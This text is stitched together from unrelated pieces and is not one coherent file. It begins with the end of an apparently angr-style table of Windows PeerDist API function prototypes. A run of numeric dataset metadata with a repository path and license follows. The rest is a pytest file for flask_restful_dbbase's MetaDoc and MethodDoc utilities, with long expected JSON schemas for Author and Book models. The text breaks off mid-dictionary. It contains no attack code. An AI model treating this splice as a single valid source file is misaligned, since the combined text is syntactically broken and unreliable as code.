'PeerDistServerOpenContentInformation': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeLongLong(signed=False, label="UInt64"), SimTypeLongLong(signed=False, label="UInt64"), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "cbContentIdentifier", "pContentIdentifier", "ullContentOffset", "cbContentLength", "hCompletionPort", "ulCompletionKey", "phContentInfo"]),
#
'PeerDistServerRetrieveContentInformation': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentInfo", "cbMaxNumberOfBytes", "pBuffer", "lpOverlapped"]),
#
'PeerDistServerCloseContentInformation': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentInfo"]),
#
'PeerDistServerCancelAsyncOperation': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "cbContentIdentifier", "pContentIdentifier", "pOverlapped"]),
#
'PeerDistClientOpenContent': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"Data": SimTypeFixedSizeArray(SimTypeChar(label="Byte"), 16)}, name="PEERDIST_CONTENT_TAG", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "pContentTag", "hCompletionPort", "ulCompletionKey", "phContentHandle"]),
#
'PeerDistClientCloseContent': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentHandle"]),
#
'PeerDistClientAddContentInformation': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentHandle", "cbNumberOfBytes", "pBuffer", "lpOverlapped"]),
#
'PeerDistClientCompleteContentInformation': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentHandle", "lpOverlapped"]),
#
'PeerDistClientAddData': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentHandle", "cbNumberOfBytes", "pBuffer", "lpOverlapped"]),
#
'PeerDistClientBlockRead': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentHandle", "cbMaxNumberOfBytes", "pBuffer", "dwTimeoutInMilliseconds", "lpOverlapped"]),
#
'PeerDistClientStreamRead': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentHandle", "cbMaxNumberOfBytes", "pBuffer", "dwTimeoutInMilliseconds", "lpOverlapped"]),
#
'PeerDistClientFlushContent': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"Data": SimTypeFixedSizeArray(SimTypeChar(label="Byte"), 16)}, name="PEERDIST_CONTENT_TAG", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "pContentTag", "hCompletionPort", "ulCompletionKey", "lpOverlapped"]),
#
'PeerDistClientCancelAsyncOperation': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentHandle", "pOverlapped"]),
#
'PeerDistGetStatusEx': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"cbSize": SimTypeInt(signed=False, label="UInt32"), "status": SimTypeInt(signed=False, label="PEERDIST_STATUS"), "dwMinVer": SimTypeInt(signed=False, label="PEERDIST_RETRIEVAL_OPTIONS_CONTENTINFO_VERSION_VALUE"), "dwMaxVer": SimTypeInt(signed=False, label="PEERDIST_RETRIEVAL_OPTIONS_CONTENTINFO_VERSION_VALUE")}, name="PEERDIST_STATUS_INFO", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "pPeerDistStatus"]),
#
'PeerDistRegisterForStatusChangeNotificationEx': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"cbSize": SimTypeInt(signed=False, label="UInt32"), "status": SimTypeInt(signed=False, label="PEERDIST_STATUS"), "dwMinVer": SimTypeInt(signed=False, label="PEERDIST_RETRIEVAL_OPTIONS_CONTENTINFO_VERSION_VALUE"), "dwMaxVer": SimTypeInt(signed=False, label="PEERDIST_RETRIEVAL_OPTIONS_CONTENTINFO_VERSION_VALUE")}, name="PEERDIST_STATUS_INFO", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hCompletionPort", "ulCompletionKey", "lpOverlapped", "pPeerDistStatus"]),
#
'PeerDistGetOverlappedResult': SimTypeFunction([SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=True, label="Int32"), arg_names=["lpOverlapped", "lpNumberOfBytesTransferred", "bWait"]),
#
'PeerDistServerOpenContentInformationEx': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeLongLong(signed=False, label="UInt64"), SimTypeLongLong(signed=False, label="UInt64"), SimTypePointer(SimStruct({"cbSize": SimTypeInt(signed=False, label="UInt32"), "dwContentInfoMinVersion": SimTypeInt(signed=False, label="UInt32"), "dwContentInfoMaxVersion": SimTypeInt(signed=False, label="UInt32"), "dwReserved": SimTypeInt(signed=False, label="UInt32")}, name="PEERDIST_RETRIEVAL_OPTIONS", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "cbContentIdentifier", "pContentIdentifier", "ullContentOffset", "cbContentLength", "pRetrievalOptions", "hCompletionPort", "ulCompletionKey", "phContentInfo"]),
#
'PeerDistClientGetInformationByHandle': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="PEERDIST_CLIENT_INFO_BY_HANDLE_CLASS"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentHandle", "PeerDistClientInfoClass", "dwBufferSize", "lpInformation"]),
}
lib.set_prototypes(prototypes)
| 307.358974
| 1,536
| 0.743514
| 2,536
| 23,974
| 6.97358
| 0.062303
| 0.172802
| 0.116709
| 0.182301
| 0.889059
| 0.88069
| 0.875035
| 0.868759
| 0.866101
| 0.864744
| 0
| 0.015297
| 0.070159
| 23,974
| 77
| 1,537
| 311.350649
| 0.778037
| 0.001168
| 0
| 0
| 0
| 0
| 0.253475
| 0.051155
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.119048
| 0
| 0.119048
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
99789d706d7e2b2f0e906c1512f9f8901cb866e0
| 49,493
|
py
|
Python
|
tests/test_doc_utils.py
|
Cider-Security-Demo/millennium-falcon
|
bf9409c7a7842ac7b67a41ebd68f4b5e9d51f490
|
[
"MIT"
] | 1
|
2020-07-23T00:53:20.000Z
|
2020-07-23T00:53:20.000Z
|
tests/test_doc_utils.py
|
Cider-Security-Demo/millennium-falcon
|
bf9409c7a7842ac7b67a41ebd68f4b5e9d51f490
|
[
"MIT"
] | null | null | null |
tests/test_doc_utils.py
|
Cider-Security-Demo/millennium-falcon
|
bf9409c7a7842ac7b67a41ebd68f4b5e9d51f490
|
[
"MIT"
] | null | null | null |
# tests/test_dbbase_resource.py
import pytest
from dbbase import DB
from flask_restful_dbbase.doc_utils import MetaDoc, MethodDoc
from flask_restful_dbbase.resources import (
ModelResource,
CollectionModelResource,
MetaResource,
)
def test_create_doc():
db = DB("sqlite///:memory:")
class Author(db.Model):
__tablename__ = "author"
id = db.Column(db.Integer, primary_key=True)
first_name = db.Column(db.String(50), nullable=False)
last_name = db.Column(db.String(50), nullable=False)
def full_name(self):
return f"{self.first_name} {self.last_name}"
books = db.relationship("Book", backref="author", lazy="joined")
class Book(db.Model):
__tablename__ = "book"
id = db.Column(db.Integer, nullable=True, primary_key=True)
isbn = db.Column(db.String(20), nullable=True)
title = db.Column(db.String(100), nullable=False)
pub_year = db.Column(db.Integer, nullable=False)
author_id = db.Column(
db.Integer, db.ForeignKey("author.id"), nullable=False
)
class Job(db.Model):
__tablename__ = "job"
id = db.Column(db.Integer, nullable=True, primary_key=True)
job_name = db.Column(db.String(100), nullable=False)
class MultipleKey(db.Model):
__tablename__ = "mult_key"
id1 = db.Column(db.Integer, nullable=True, primary_key=True)
id2 = db.Column(db.Integer, nullable=True, primary_key=True)
db.create_all()
class AuthorResource(ModelResource):
model_class = Author
serial_fields = {"post": {Job: ["id", "job_name"]}}
class AuthorCollectionResource(CollectionModelResource):
model_class = Author
class AuthorMetaResource(MetaResource):
resource_class = AuthorResource
class AuthorCollectionMetaResource(MetaResource):
resource_class = AuthorCollectionResource
with pytest.raises(ValueError) as err:
MetaDoc(resource_class=AuthorResource, methods="potato")
assert str(err.value) == "methods must be a dictionary"
meta_doc = MetaDoc(resource_class=AuthorResource)
assert meta_doc.resource_class == AuthorResource
assert meta_doc.model_class == Author._class()
assert meta_doc.url_prefix == AuthorResource.url_prefix
assert meta_doc.base_url == AuthorResource.create_url()
assert meta_doc.methods == {}
assert meta_doc.table is None
post_method_doc = MethodDoc(method="post")
assert post_method_doc.input is None
assert post_method_doc.input_modifier is None
assert post_method_doc.before_commit is None
assert post_method_doc.after_commit is None
assert post_method_doc.responses == []
post_method_doc.input_modifier = "this describes the input_modifier"
post_method_doc.before_commit = "this describes the before_commit"
post_method_doc.after_commit = "this describes the after_commit"
assert post_method_doc.to_dict(meta_doc) == {
"url": "/authors",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
},
"input_modifier": "this describes the input_modifier",
"before_commit": "this describes the before_commit",
"after_commit": "this describes the after_commit",
"responses": [
{
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"jobName": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
}
}
],
}
# shows a job returned
meta_doc.methods["post"] = post_method_doc
assert meta_doc.to_dict() == {
"modelClass": "Author",
"urlPrefix": "/",
"baseUrl": "/authors",
"methods": {
"get": {
"url": "/authors/<int:id>",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
}
},
"responses": [
{
"fields": {
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
"fullName": {"readOnly": True},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
}
}
],
},
"post": {
"url": "/authors",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
},
"input_modifier": "this describes the input_modifier",
"before_commit": "this describes the before_commit",
"after_commit": "this describes the after_commit",
"responses": [
{
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"jobName": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
}
}
],
},
"put": {
"url": "/authors/<int:id>",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
},
"responses": [
{
"fields": {
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
"fullName": {"readOnly": True},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
}
}
],
},
"patch": {
"url": "/authors/<int:id>",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
},
"responses": [
{
"fields": {
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
"fullName": {"readOnly": True},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
}
}
],
},
"delete": {
"url": "/authors/<int:id>",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
}
},
"responses": [{}],
},
},
"table": {
"Author": {
"type": "object",
"properties": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"first_name": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"last_name": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"full_name": {"readOnly": True},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pub_year": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"author_id": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
},
"xml": "Author",
}
},
}
get_method_doc = MethodDoc(method="get")
put_method_doc = MethodDoc(method="put")
patch_method_doc = MethodDoc(method="patch")
delete_method_doc = MethodDoc(method="delete")
assert get_method_doc.to_dict(meta_doc=meta_doc) == {
"url": "/authors/<int:id>",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
}
},
"responses": [
{
"fields": {
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
